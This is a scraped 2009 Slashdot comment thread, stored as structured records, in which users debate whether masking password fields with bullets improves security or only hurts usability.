	<htmltext><p>I think it really is depends on context.</p><p>Like somebody mentioned that unix passwords don't even reveal how many characters are there in your password. I think all unix(including linux but not macs) applications should work that way. Even cross-platform browsers like firefox should completely hide passwords (Or just display a symbol indicating the password has been typed).</p><p>Compare with 80\% of Windows users. You should just assume their system is infected, they write down their passwords on post-its and paste them in the monitor, the clever ones paste it under the keyboard.</p><p>They even tell their passwords to their friends and family due social preassure or parental surveillance.</p><p>Core windows applications like msn messenger send passwords in clear text through the network.</p><p>The kind of protection provided by masked passwords is moot in this context.</p><p>Considering the same level of protection can be achieved by physically looking around for bystanders or placing you hand over the monitor makes it further moot.</p><p>MacOS... I don't know, the average MacOS user is not as clueless as the randomly chosen Windows user tends to be, but a significant share of them are of the "don't want to know shit outside my specialty" variety, so unmasked passwords still seem a good idea in that platform.</p></htmltext>
<tokenext>I think it really is depends on context.Like somebody mentioned that unix passwords do n't even reveal how many characters are there in your password .
I think all unix ( including linux but not macs ) applications should work that way .
Even cross-platform browsers like firefox should completely hide passwords ( Or just display a symbol indicating the password has been typed ) .Compare with 80 \ % of Windows users .
You should just assume their system is infected , they write down their passwords on post-its and paste them in the monitor , the clever ones paste it under the keyboard.They even tell their passwords to their friends and family due social preassure or parental surveillance.Core windows applications like msn messenger send passwords in clear text through the network.The kind of protection provided by masked passwords is moot in this context.Considering the same level of protection can be achieved by physically looking around for bystanders or placing you hand over the monitor makes it further moot.MacOS... I do n't know , the average MacOS user is not as clueless as the randomly chosen Windows user tends to be , but a significant share of them are of the " do n't want to know shit outside my specialty " variety , so unmasked passwords still seem a good idea in that platform .</tokentext>
<sentencetext>I think it really is depends on context.Like somebody mentioned that unix passwords don't even reveal how many characters are there in your password.
I think all unix(including linux but not macs) applications should work that way.
Even cross-platform browsers like firefox should completely hide passwords (Or just display a symbol indicating the password has been typed).Compare with 80\% of Windows users.
You should just assume their system is infected, they write down their passwords on post-its and paste them in the monitor, the clever ones paste it under the keyboard.They even tell their passwords to their friends and family due social preassure or parental surveillance.Core windows applications like msn messenger send passwords in clear text through the network.The kind of protection provided by masked passwords is moot in this context.Considering the same level of protection can be achieved by physically looking around for bystanders or placing you hand over the monitor makes it further moot.MacOS... I don't know, the average MacOS user is not as clueless as the randomly chosen Windows user tends to be, but a significant share of them are of the "don't want to know shit outside my specialty" variety, so unmasked passwords still seem a good idea in that platform.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28479627</id>
	<title>Row of bullets?</title>
	<author>Pravetz-82</author>
	<datestamp>1246014540000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>when users type in passwords and the only feedback they get is a row of bullets.</p></div><p>That's a bit harsh for just typing a password...</p></div>
	</htmltext>
<tokenext>when users type in passwords and the only feedback they get is a row of bullets.That 's a bit harsh for just typing a password.. .</tokentext>
<sentencetext>when users type in passwords and the only feedback they get is a row of bullets.That's a bit harsh for just typing a password...
	</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471815</id>
	<title>Re:Masking passwords doesn't do much</title>
	<author>CoccoBill</author>
	<datestamp>1245922800000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>If a malicious person can see your screen, than they are probably close enough that that can tap your cables, install hardware keyloggers, sniff your EMF, cold boot your RAM and grep it, do audio analysis of your typing and decipher your keystrokes, and etc.</p><p>***ing your passwords protects against a very small hole....the situation where someone is allowed to see your screen but is searched to make sure they have no monitoring equipment, has the keyboard kept out of site, and isn't allowed to touch anything.</p></div><p>Yes, I find it highly annoying in business meetings when the damn consultants try to steal my RAM and install keyloggers on my machine while I'm giving a presentation on the projector. Luckily I'm the only person that ever goes to business meetings so on a larger scale it's really a non-issue.</p></div>
	</htmltext>
<tokenext>If a malicious person can see your screen , than they are probably close enough that that can tap your cables , install hardware keyloggers , sniff your EMF , cold boot your RAM and grep it , do audio analysis of your typing and decipher your keystrokes , and etc .
* * * ing your passwords protects against a very small hole....the situation where someone is allowed to see your screen but is searched to make sure they have no monitoring equipment , has the keyboard kept out of site , and is n't allowed to touch anything.Yes , I find it highly annoying in business meetings when the damn consultants try to steal my RAM and install keyloggers on my machine while I 'm giving a presentation on the projector .
Luckily I 'm the only person that ever goes to business meetings so on a larger scale it 's really a non-issue .</tokentext>
<sentencetext>If a malicious person can see your screen, than they are probably close enough that that can tap your cables, install hardware keyloggers, sniff your EMF, cold boot your RAM and grep it, do audio analysis of your typing and decipher your keystrokes, and etc.
***ing your passwords protects against a very small hole....the situation where someone is allowed to see your screen but is searched to make sure they have no monitoring equipment, has the keyboard kept out of site, and isn't allowed to touch anything.Yes, I find it highly annoying in business meetings when the damn consultants try to steal my RAM and install keyloggers on my machine while I'm giving a presentation on the projector.
Luckily I'm the only person that ever goes to business meetings so on a larger scale it's really a non-issue.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471351</id>
	<title>People are a problem</title>
	<author>bky1701</author>
	<datestamp>1245921240000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>3</modscore>
	<htmltext>On my old website, I had for a while password fields with no bullets. I had assumed, that given the low-importance nature of the site and all, no one would really care, and it did make it easier.
<br> <br>
A few weeks after opening, I had found out that a few people had not created accounts, because they had the strange idea that not having bullets somehow made the site less secure. That somehow, *I* would be able to see their password, more than if there were bullets.
<br> <br>
Needless to say, I changed over my password fields to bulleted, because I didn't want to lose any possible members to such a stupid problem. I still think that plain text is better, but it has become mandatory security theater. Much like an SSL cert makes even the most questionable site legitimate, lacking bulleted passwords makes people think you're being sneaky somehow. It is sad, but it's reality.</htmltext>
<tokenext>On my old website , I had for a while password fields with no bullets .
I had assumed , that given the low-importance nature of the site and all , no one would really care , and it did make it easier .
A few weeks after opening , I had found out that a few people had not created accounts , because they had the strange idea that not having bullets somehow made the site less secure .
That somehow , * I * would be able to see their password , more than if there were bullets .
Needless to say , I changed over my password fields to bulleted , because I did n't want to lose any possible members to such a stupid problem .
I still think that plain text is better , but it has become mandatory security theater .
Much like an SSL cert makes even the most questionable site legitimate , lacking bulleted passwords makes people think you 're being sneaky somehow .
It is sad , but it 's reality .</tokentext>
<sentencetext>On my old website, I had for a while password fields with no bullets.
I had assumed, that given the low-importance nature of the site and all, no one would really care, and it did make it easier.
A few weeks after opening, I had found out that a few people had not created accounts, because they had the strange idea that not having bullets somehow made the site less secure.
That somehow, *I* would be able to see their password, more than if there were bullets.
Needless to say, I changed over my password fields to bulleted, because I didn't want to lose any possible members to such a stupid problem.
I still think that plain text is better, but it has become mandatory security theater.
Much like an SSL cert makes even the most questionable site legitimate, lacking bulleted passwords makes people think you're being sneaky somehow.
It is sad, but it's reality.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473347</id>
	<title>Re:Another two words</title>
	<author>Gnom3</author>
	<datestamp>1245928320000</datestamp>
	<modclass>Informativ</modclass>
	<modscore>2</modscore>
	<htmltext>You still need to be ware of the saved password features in some browser (Firefox &amp; Chrome at least.) There are ways that your saved password could potentially be viewed in plain text by anyone that has a few seconds of access to your browser.
<br> <br>
You can read more about it <a href="http://foxsys.blogspot.com/2008/07/firefox-3-saved-password-security.html" title="blogspot.com" rel="nofollow">HERE</a> [blogspot.com] and <a href="http://foxsys.blogspot.com/2008/10/google-chrome-shows-saved-passwords-in.html" title="blogspot.com" rel="nofollow">HERE</a> [blogspot.com]</htmltext>
<tokenext>You still need to be ware of the saved password features in some browser ( Firefox &amp; Chrome at least .
) There are ways that your saved password could potentially be viewed in plain text by anyone that has a few seconds of access to your browser .
You can read more about it HERE [ blogspot.com ] and HERE [ blogspot.com ]</tokentext>
<sentencetext>You still need to be ware of the saved password features in some browser (Firefox &amp; Chrome at least.
) There are ways that your saved password could potentially be viewed in plain text by anyone that has a few seconds of access to your browser.
You can read more about it HERE [blogspot.com] and HERE [blogspot.com]</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471167</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472617</id>
	<title>It only takes once...</title>
	<author>element-o.p.</author>
	<datestamp>1245925260000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>But in this case, does usability outweigh security?</p></div><p> (from TFS)
<br>
9 times out of 10, yes.  But that 10th time is the only one that matters.
<br> <br>
I can't tell you how many times I've had to login to something -- a server, a web page, e-mail -- on someone else's computer, with them sitting right next to me, watching as I log in.  I'm comfortable enough not to worry about them stealing my password by watching my hands on the keyboard, but if I had to entere an unmasked password into a login prompt, that would be another thing entirely.
<br> <br>
Keep masking the password prompt, please.</p></div>
	</htmltext>
<tokenext>But in this case , does usability outweigh security ?
( from TFS ) 9 times out of 10 , yes .
But that 10th time is the only one that matters .
I ca n't tell you how many times I 've had to login to something -- a server , a web page , e-mail -- on someone else 's computer , with them sitting right next to me , watching as I log in .
I 'm comfortable enough not to worry about them stealing my password by watching my hands on the keyboard , but if I had to entere an unmasked password into a login prompt , that would be another thing entirely .
Keep masking the password prompt , please .</tokentext>
<sentencetext>But in this case, does usability outweigh security?
(from TFS)

9 times out of 10, yes.
But that 10th time is the only one that matters.
I can't tell you how many times I've had to login to something -- a server, a web page, e-mail -- on someone else's computer, with them sitting right next to me, watching as I log in.
I'm comfortable enough not to worry about them stealing my password by watching my hands on the keyboard, but if I had to entere an unmasked password into a login prompt, that would be another thing entirely.
Keep masking the password prompt, please.
	</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28486099</id>
	<title>Re:Runaway security</title>
	<author>BitZtream</author>
	<datestamp>1246044060000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>And why do you need to see your password?</p><p>Do you not know your own password?</p><p>Do you type so poorly that you waste an extrodinary amount of time retyping your password or being locked out because you typed it wrong?</p><p>Did you even think about this before it was brought up on slashdot?</p><p>Have you answered yes to any of the previous questions?</p><p>Still saying no eh?</p><p>Just because you don't understand how these simple things provide security doesn't mean they don't.  The problem is you simply don't understand how quickly this things can be taken advantage of so you think its not important.</p><p>Fortunately, where I work we have a very nice policy for someone that doesn't think its important, we release you and no longer worry about you leaking our data<nobr> <wbr></nobr>:)</p><p>So heres what you do, as a trial for your bright idea.  Every time you go to the ATM, say your pin number loud and clear and make sure everyone around you can understand it.  Thats effectively what you are saying is okay.</p><p>Are you willing to do that?</p><p>Why is it you keep saying no?</p></htmltext>
<tokenext>And why do you need to see your password ? Do you not know your own password ? Do you type so poorly that you waste an extrodinary amount of time retyping your password or being locked out because you typed it wrong ? Did you even think about this before it was brought up on slashdot ? Have you answered yes to any of the previous questions ? Still saying no eh ? Just because you do n't understand how these simple things provide security does n't mean they do n't .
The problem is you simply do n't understand how quickly this things can be taken advantage of so you think its not important.Fortunately , where I work we have a very nice policy for someone that does n't think its important , we release you and no longer worry about you leaking our data : ) So heres what you do , as a trial for your bright idea .
Every time you go to the ATM , say your pin number loud and clear and make sure everyone around you can understand it .
Thats effectively what you are saying is okay.Are you willing to do that ? Why is it you keep saying no ?</tokentext>
<sentencetext>And why do you need to see your password?Do you not know your own password?Do you type so poorly that you waste an extrodinary amount of time retyping your password or being locked out because you typed it wrong?Did you even think about this before it was brought up on slashdot?Have you answered yes to any of the previous questions?Still saying no eh?Just because you don't understand how these simple things provide security doesn't mean they don't.
The problem is you simply don't understand how quickly this things can be taken advantage of so you think its not important.Fortunately, where I work we have a very nice policy for someone that doesn't think its important, we release you and no longer worry about you leaking our data :)So heres what you do, as a trial for your bright idea.
Every time you go to the ATM, say your pin number loud and clear and make sure everyone around you can understand it.
Thats effectively what you are saying is okay.Are you willing to do that?Why is it you keep saying no?</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471327</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28474077</id>
	<title>Making it Commercial vs Secure</title>
	<author>Fringe</author>
	<datestamp>1245931440000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>This is near-and-dear to my heart because I recently had to design reduced-security per market research.  The product is all about security, and yet the sales research showed that security was inconvenient, both to the user and to their corporate I.T. staff, and served as a significant barrier to sales.  Never mind that every review said this is the most secure thing out there - that only gets you in the door.  So we had to reduce physical security, reduce creation security and reduce password complexity requirements.<p>
The disconnect between sales and science is enormous.</p><p>
For programs I write for myself, including an open-source encryption program for cellphones and desktops, I have for years simply provided a checkbox so the user can decide whether to mask the password.  I can't stand masking on my cellphone, and rather doubt it's at that big a risk.  </p><p>
I'm beginning to think that retinal scans are the way to go.  At least then the user always has their key on them.</p></htmltext>
<tokenext>This is near-and-dear to my heart because I recently had to design reduced-security per market research .
The product is all about security , and yet the sales research showed that security was inconvenient , both to the user and to their corporate I.T .
staff , and served as a significant barrier to sales .
Never mind that every review said this is the most secure thing out there - that only gets you in the door .
So we had to reduce physical security , reduce creation security and reduce password complexity requirements .
The disconnect between sales and science is enormous .
For programs I write for myself , including an open-source encryption program for cellphones and desktops , I have for years simply provided a checkbox so the user can decide whether to mask the password .
I ca n't stand masking on my cellphone , and rather doubt it 's at that big a risk .
I 'm beginning to think that retinal scans are the way to go .
At least then the user always has their key on them .</tokentext>
<sentencetext>This is near-and-dear to my heart because I recently had to design reduced-security per market research.
The product is all about security, and yet the sales research showed that security was inconvenient, both to the user and to their corporate I.T.
staff, and served as a significant barrier to sales.
Never mind that every review said this is the most secure thing out there - that only gets you in the door.
So we had to reduce physical security, reduce creation security and reduce password complexity requirements.
The disconnect between sales and science is enormous.
For programs I write for myself, including an open-source encryption program for cellphones and desktops, I have for years simply provided a checkbox so the user can decide whether to mask the password.
I can't stand masking on my cellphone, and rather doubt it's at that big a risk.
I'm beginning to think that retinal scans are the way to go.
At least then the user always has their key on them.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471739</id>
	<title>Limesurvey is the best..</title>
	<author>citylivin</author>
	<datestamp>1245922500000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>When you go to change your password in limesurvey, as expected the characters are bulleted out.</p><p>The funny part comes when you click 'change password' and immediately you are presented with a page stating your username and plain text password.</p><p>Genius.</p></htmltext>
<tokenext>When you go to change your password in limesurvey , as expected the characters are bulleted out.The funny part comes when you click 'change password ' and immediately you are presented with a page stating your username and plain text password.Genius .</tokentext>
<sentencetext>When you go to change your password in limesurvey, as expected the characters are bulleted out.The funny part comes when you click 'change password' and immediately you are presented with a page stating your username and plain text password.Genius.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471763</id>
	<title>Why not abolish passwords?</title>
	<author>darthwader</author>
	<datestamp>1245922560000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>The problem isn't the use of password asterisks, but the use of passwords in the first place.  Good password usage requires a password to be 8 or 14 characters long, contain lower case, UPPER CASE, &amp;ymbols, numb3rs, etc., and be unique: never repeat a password on multiple systems.</p><p>This is a lot of work, and  these rules are being applied in cases where they are completely unnecessary.</p><p>In the real world, we understand that some situations require a solid steel door with a $300 deadbolt, and other situations only require a plywood door with a $1.99 padlock.  And some don't require a lock at all, a simple "keep out" sign is enough.</p><p>We need to have better conventions to deal with trivial sites like Slashdot and Facebook, where it really is not at all serious if someone hacks my account, and important sites like my credit card company or Paypall, where a hacker can cause significant financial damage.</p><p>I'd love it if every site that required a login would offer 3 levels of security:<br>a) No security: anyone who types in my username can pretend to be me.  This site is not allowed to store any financial details about me, and everyone knows that it is trivial to impersonate someone.<br>b) Minimal security: A simple password or browser cookie is enough.  Someone hacking my account might embarrass me, but it's no great damage.    This site is not allowed to store any financial details about me.<br>c) Significant security: SSL and a good password, or client certificate based security.  Anyone hacking this site can get access to my bank account or credit cards.</p></htmltext>
<tokenext>The problem is n't the use of password asterisks , but the use of passwords in the first place .
Good password usage requires a password to be 8 or 14 characters long , contain lower case , UPPER CASE , &amp;ymbols , numb3rs , etc. , and be unique : never repeat a password on multiple systems.This is a lot of work , and these rules are being applied in cases where they are completely unnecessary.In the real world , we understand that some situations require a solid steel door with a $ 300 deadbolt , and other situations only require a plywood door with a $ 1.99 padlock .
And some do n't require a lock at all , a simple " keep out " sign is enough.We need to have better conventions to deal with trivial sites like Slashdot and Facebook , where it really is not at all serious if someone hacks my account , and important sites like my credit card company or Paypall , where a hacker can cause significant financial damage.I 'd love it if every site that required a login would offer 3 levels of security : a ) No security : anyone who types in my username can pretend to be me .
This site is not allowed to store any financial details about me , and everyone knows that it is trivial to impersonate someone.b ) Minimal security : A simple password or browser cookie is enough .
Someone hacking my account might embarrass me , but it 's no great damage .
This site is not allowed to store any financial details about me.c ) Significant security : SSL and a good password , or client certificate based security .
Anyone hacking this site can get access to my bank account or credit cards .</tokentext>
<sentencetext>The problem isn't the use of password asterisks, but the use of passwords in the first place.
Good password usage requires a password to be 8 or 14 characters long, contain lower case, UPPER CASE, &amp;ymbols, numb3rs, etc., and be unique: never repeat a password on multiple systems.This is a lot of work, and  these rules are being applied in cases where they are completely unnecessary.In the real world, we understand that some situations require a solid steel door with a $300 deadbolt, and other situations only require a plywood door with a $1.99 padlock.
And some don't require a lock at all, a simple "keep out" sign is enough.We need to have better conventions to deal with trivial sites like Slashdot and Facebook, where it really is not at all serious if someone hacks my account, and important sites like my credit card company or Paypall, where a hacker can cause significant financial damage.I'd love it if every site that required a login would offer 3 levels of security:a) No security: anyone who types in my username can pretend to be me.
This site is not allowed to store any financial details about me, and everyone knows that it is trivial to impersonate someone.b) Minimal security: A simple password or browser cookie is enough.
Someone hacking my account might embarrass me, but it's no great damage.
This site is not allowed to store any financial details about me.c) Significant security: SSL and a good password, or client certificate based security.
Anyone hacking this site can get access to my bank account or credit cards.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28482717</id>
	<title>Retarded</title>
	<author>midtoad</author>
	<datestamp>1246031820000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>What is really retarded is that Microsoft requires you to type a 26-character WEP key TWICE when connecting to a secured wireless network?  Why the F\%^&amp;* should you have to confirm that key?  You are not setting a new key, just entering one that already exists.</p><p>Ubuntu has it right - in most places where you have to enter a password, you can optionally unmask the characters.</p></htmltext>
<tokenext>What is really retarded is that Microsoft requires you to type a 26-character WEP key TWICE when connecting to a secured wireless network ?
Why the F \ % ^ &amp; * should you have to confirm that key ?
You are not setting a new key , just entering one that already exists.Ubuntu has it right - in most places where you have to enter a password , you can optionally unmask the characters .</tokentext>
<sentencetext>What is really retarded is that Microsoft requires you to type a 26-character WEP key TWICE when connecting to a secured wireless network?
Why the F\%^&amp;* should you have to confirm that key?
You are not setting a new key, just entering one that already exists.Ubuntu has it right - in most places where you have to enter a password, you can optionally unmask the characters.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471181</id>
	<title>Four words</title>
	<author>Carnildo</author>
	<datestamp>1245920760000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><blockquote><div><p>Shoulder surfing.</p></div></blockquote><p>Only person in room.</p><p>Seriously, upwards of 99\% of the time I type in a password, I'm the only person in the room and the door is closed.  Does displaying bullets (or worse, nothing) really improve security?  If I can see the password as I type it, I can write an epic passpoem that's almost impossible to guess, because I can see the typos I make.  If I can't, I'm limited to about 30 lowercase alphanumerics, or ten random characters: beyond that, tyops are too common.</p></div>
	</htmltext>
<tokenext>Shoulder surfing.Only person in room.Seriously , upwards of 99 \ % of the time I type in a password , I 'm the only person in the room and the door is closed .
Does displaying bullets ( or worse , nothing ) really improve security ?
If I can see the password as I type it , I can write an epic passpoem that 's almost impossible to guess , because I can see the typos I make .
If I ca n't , I 'm limited to about 30 lowercase alphanumerics , or ten random characters : beyond that , tyops are too common .</tokentext>
<sentencetext>Shoulder surfing.Only person in room.Seriously, upwards of 99\% of the time I type in a password, I'm the only person in the room and the door is closed.
Does displaying bullets (or worse, nothing) really improve security?
If I can see the password as I type it, I can write an epic passpoem that's almost impossible to guess, because I can see the typos I make.
If I can't, I'm limited to about 30 lowercase alphanumerics, or ten random characters: beyond that, tyops are too common.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472501</id>
	<title>Ah,now stern advice...</title>
	<author>WheelDweller</author>
	<datestamp>1245924900000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>...from people who've dedicated decades to intelligent-guessing of TV shows.</p><p>And not necessarily sucessfully; Star Trek was taken off, then began a 40 year progress into other forms, including 4-5 other series.</p><p>Ya know, if they want to offer advice about how many people have used a shower, based on the number of residents in a town, I'll ask them. They have no track record of IT breakthroughs.</p><p>I wish there was a better way; biomedics is flawed (not to mention, who wants to lose a thumb/eye/etc?) so until something better comes along, this will have to do.</p><p>It's precisely the same argument about so-called "green" electricity. If it's not nuclear, it can't get anywhere NEAR the cost of coal/oil. Nothing can.  There's not anything even 'coming around the corner' that could possibly fill the void.  Yet the public perception, until it's bought and tried, is that they're one and the same.</p><p>Some things need to be left alone.  Change it, and see.</p></htmltext>
<tokenext>...from people who 've dedicated decades to intelligent-guessing of TV shows.And not necessarily sucessfully ; Star Trek was taken off , then began a 40 year progress into other forms , including 4-5 other series.Ya know , if they want to offer advice about how many people have used a shower , based on the number of residents in a town , I 'll ask them .
They have no track record of IT breakthroughs.I wish there was a better way ; biomedics is flawed ( not to mention , who wants to lose a thumb/eye/etc ?
) so until something better comes along , this will have to do.It 's precisely the same argument about so-called " green " electricity .
If it 's not nuclear , it ca n't get anywhere NEAR the cost of coal/oil .
Nothing can .
There 's not anything even 'coming around the corner ' that could possibly fill the void .
Yet the public perception , until it 's bought and tried , is that they 're one and the same.Some things need to be left alone .
Change it , and see .</tokentext>
<sentencetext>...from people who've dedicated decades to intelligent-guessing of TV shows.And not necessarily sucessfully; Star Trek was taken off, then began a 40 year progress into other forms, including 4-5 other series.Ya know, if they want to offer advice about how many people have used a shower, based on the number of residents in a town, I'll ask them.
They have no track record of IT breakthroughs.I wish there was a better way; biomedics is flawed (not to mention, who wants to lose a thumb/eye/etc?
) so until something better comes along, this will have to do.It's precisely the same argument about so-called "green" electricity.
If it's not nuclear, it can't get anywhere NEAR the cost of coal/oil.
Nothing can.
There's not anything even 'coming around the corner' that could possibly fill the void.
Yet the public perception, until it's bought and tried, is that they're one and the same.Some things need to be left alone.
Change it, and see.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472079</id>
	<title>Re:Biometric scanners</title>
	<author>bhagwad</author>
	<datestamp>1245923400000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>I look forward to a world where a thief can just ASK me for my password at gunpoint instead of etching my eye out or slicing my face off!</htmltext>
<tokenext>I look forward to a world where a thief can just ASK me for my password at gunpoint instead of etching my eye out or slicing my face off !</tokentext>
<sentencetext>I look forward to a world where a thief can just ASK me for my password at gunpoint instead of etching my eye out or slicing my face off!</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470985</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471721</id>
	<title>Re:Masking passwords doesn't do much</title>
	<author>St.Creed</author>
	<datestamp>1245922440000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>If someone can shouldersurf, 99\% of the time they have physical access and all security is null.</p></div><p>That goes for people who know what they're doing. However, most of the users in the office are NOT able to hack the PC like that. However, every idiot that can see my password can enter it. </p><p>Even with physical access: try hacking a dumb terminal. It's pretty hard without hardware hacks. But if you you display my password in cleartext, in the office space with 2 people behind me that I didn't see come up to me, my account is compromised.</p></div>
	</htmltext>
<tokenext>If someone can shouldersurf , 99 \ % of the time they have physical access and all security is null.That goes for people who know what they 're doing .
However , most of the users in the office are NOT able to hack the PC like that .
However , every idiot that can see my password can enter it .
Even with physical access : try hacking a dumb terminal .
It 's pretty hard without hardware hacks .
But if you you display my password in cleartext , in the office space with 2 people behind me that I did n't see come up to me , my account is compromised .</tokentext>
<sentencetext>If someone can shouldersurf, 99\% of the time they have physical access and all security is null.That goes for people who know what they're doing.
However, most of the users in the office are NOT able to hack the PC like that.
However, every idiot that can see my password can enter it.
Even with physical access: try hacking a dumb terminal.
It's pretty hard without hardware hacks.
But if you you display my password in cleartext, in the office space with 2 people behind me that I didn't see come up to me, my account is compromised.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28483115</id>
	<title>Temporary visibility</title>
	<author>Anonymous</author>
	<datestamp>1246033020000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>The Treo browser shows the last character of the password for a few seconds, then masks it.</p><p>It's a really nice feature on small keyboards, but could work everywhere.</p><p>-Dan</p></htmltext>
<tokenext>The Treo browser shows the last character of the password for a few seconds , then masks it.It 's a really nice feature on small keyboards , but could work everywhere.-Dan</tokentext>
<sentencetext>The Treo browser shows the last character of the password for a few seconds, then masks it.It's a really nice feature on small keyboards, but could work everywhere.-Dan</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471299</id>
	<title>Re:Easy solution</title>
	<author>Anonymous</author>
	<datestamp>1245921120000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>The bios password on my old computer could be bypassed by typing in all asterisks. Not sure if it was a backdoor or a bug</p></htmltext>
<tokenext>The bios password on my old computer could be bypassed by typing in all asterisks .
Not sure if it was a backdoor or a bug</tokentext>
<sentencetext>The bios password on my old computer could be bypassed by typing in all asterisks.
Not sure if it was a backdoor or a bug</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470979</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471667</id>
	<title>Re:Masking passwords doesn't do much</title>
	<author>Anonymous</author>
	<datestamp>1245922260000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Good luck seeing the keystrokes of anyone who can type with any kind of proficiency at all.  I highly doubt anyone would be able to follow my fingers well enough to determine my 14-character password typed within 2 seconds.</p></htmltext>
<tokenext>Good luck seeing the keystrokes of anyone who can type with any kind of proficiency at all .
I highly doubt anyone would be able to follow my fingers well enough to determine my 14-character password typed within 2 seconds .</tokentext>
<sentencetext>Good luck seeing the keystrokes of anyone who can type with any kind of proficiency at all.
I highly doubt anyone would be able to follow my fingers well enough to determine my 14-character password typed within 2 seconds.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471391</id>
	<title>Re:Only when registering</title>
	<author>gcalkin</author>
	<datestamp>1245921420000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>I agree strongly with this - setting passwords blind is a pain.  It is easier to remember the password, easier to check for strength (lets not start that arguement), easier to ensure that the caps lock is not on.

And mostly, you should be in a position to see the password in some degree of privacy.

Or maybe the answer is to obfuscate the login id as well as the password.<nobr> <wbr></nobr>:)  Makes shoulder surfing harder.  Just got to watch out for the web cam pointing at the keyboard (i.e. how ATM hacks work)</htmltext>
<tokenext>I agree strongly with this - setting passwords blind is a pain .
It is easier to remember the password , easier to check for strength ( lets not start that arguement ) , easier to ensure that the caps lock is not on .
And mostly , you should be in a position to see the password in some degree of privacy .
Or maybe the answer is to obfuscate the login id as well as the password .
: ) Makes shoulder surfing harder .
Just got to watch out for the web cam pointing at the keyboard ( i.e .
how ATM hacks work )</tokentext>
<sentencetext>I agree strongly with this - setting passwords blind is a pain.
It is easier to remember the password, easier to check for strength (lets not start that arguement), easier to ensure that the caps lock is not on.
And mostly, you should be in a position to see the password in some degree of privacy.
Or maybe the answer is to obfuscate the login id as well as the password.
:)  Makes shoulder surfing harder.
Just got to watch out for the web cam pointing at the keyboard (i.e.
how ATM hacks work)</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470971</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470999</id>
	<title>Re:Two words</title>
	<author>Mr. Slippery</author>
	<datestamp>1245963360000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
